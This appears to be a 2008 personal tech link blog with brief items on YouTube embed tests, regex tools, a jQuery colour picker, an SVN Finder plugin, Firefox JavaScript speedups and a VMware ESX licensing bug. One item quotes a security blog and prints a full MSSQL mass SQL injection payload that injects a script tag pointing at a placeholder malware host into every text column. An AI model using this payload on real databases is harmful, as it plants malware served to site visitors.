9-11 YouTube video test

anarchy

[kml_flashembed movie=”http://www.youtube.com/watch?v=TtTPhCj6_K4″ width=”425″ height=”350″ wmode=”transparent” /]

anarchy bastardized

[kml_flashembed movie=”http://www.youtube.com/v/TtTPhCj6_K4″ width=”425″ height=”350″ wmode=”transparent” /]

viper’s video quicktags

[youtube]http://www.youtube.com/v/TtTPhCj6_K4[/youtube]

Hello

Viper’s video quicktags bastardized

[youtube]http://www.youtube.com/watch?v=TtTPhCj6_K4[/youtube]

Regular Expression Tools

  • RegExr is an excellent web-based utility that helps you construct a RegEx query by showing you results in real time. Hits are highlighted as you write your expression. 
  • Regular Expression Tutorial - This regular expression tutorial teaches you every aspect of regular expressions. Each topic assumes you have read and understood all previous topics. So if you are new to regular expressions, I recommend you read the topics in the order presented.
  • tuaw tip regular expressions for beginners

Farbtastic: jQuery color picker plug-in | Steven Wittens – Acko.net

Farbtastic Color Picker widgetFarbtastic is a jQuery plug-in that can add one or more color picker widgets into a page through JavaScript. Each widget is then linked to an existing element (e.g. a text field) and will update the element’s value when a color is selected.

Download Farbtastic 1.2 – 8 January 2007 (License: GPL).

Farbtastic: jQuery color picker plug-in | Steven Wittens – Acko.net

Release 0.7.2 of SCPlugin (for svn 1.4.x or 1.5.x)

2008/07/05 – Announcing Release 0.7.2 of SCPlugin!

SCPlugin Finder Integration contextual menu
I’ve just put up the final release of 0.7.2, in the usual place. This release makes major improvements in user name / password handling, appearance, and personalization, and now supports your choice of Subversion 1.4.6 or 1.5.0. I encourage all users to upgrade. See the announcement for full details.

More at scplugin.tigris.org

Firefox to get faster JavaScript

Firefox to get massive JavaScript performance boostJavaScript SpiderMonkey improvements

Mozilla is leveraging an impressive new optimization technique to bring a big performance boost to the Firefox JavaScript engine. The code was merged today (but is not yet ready to be enabled by default in the nightly builds) and is planned for inclusion in Firefox 3.1, the next incremental update of the open-source web browser.   

 

TrustedSource – Blog – New SQL Injection Attack Infecting Machines

Here’s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to:

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update [‘+@T+’] set [‘+@C +’]=[‘+@C+’]+””></title><script src=”http://www.domain.com/malware/ w.js”></script><!–” where ‘+@C+’ not like ”%”></title><script src=”http://www.domain.com/malware/w.js “></script><!–”’)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

 TrustedSource – Blog – New SQL Injection Attack Infecting Machines

Whoop! VMWare licensing bug!

This is pretty serious…SymptomsA virtual machine fails to power on, fails to leave suspend mode, or fails to migrate with VMotion and the following message is displayed in the vmware.log file for the virtual machine:This product has expired. Be sure that your host machine’s date and time are set correctly. There is a more recent version available at the VMware web site: http://www.vmware.com/info?id=4.————–Module License Power on failed.Currently running virtual machines will continue to run but will not be able to perform migration with VMotion, suspend or power on virtual machines. Resolution An issue with ESX/ESXi 3.5 Update 2 causes the product license to expire on August 12, 2008. VMware engineering has isolated the root cause of this issue and will reissue the various upgrade media including the ESX 3.5 Update 2 ISO, ESXi 3.5 Update 2 ISO, ESX 3.5 Update 2 upgrade tar and zip files by noon, PST on August 13.These will be available from the page: http://www.vmware.com/download/vi.  Until then, VMware advises against upgrading to ESX/ESXi 3.5 Update 2. The Update patch bundles will be released separately later in the week.This KB article will be updated as soon as more information is available, check back frequently for updates and additions.  All your VM’s belong to us – Matthew Marlowe’s Blog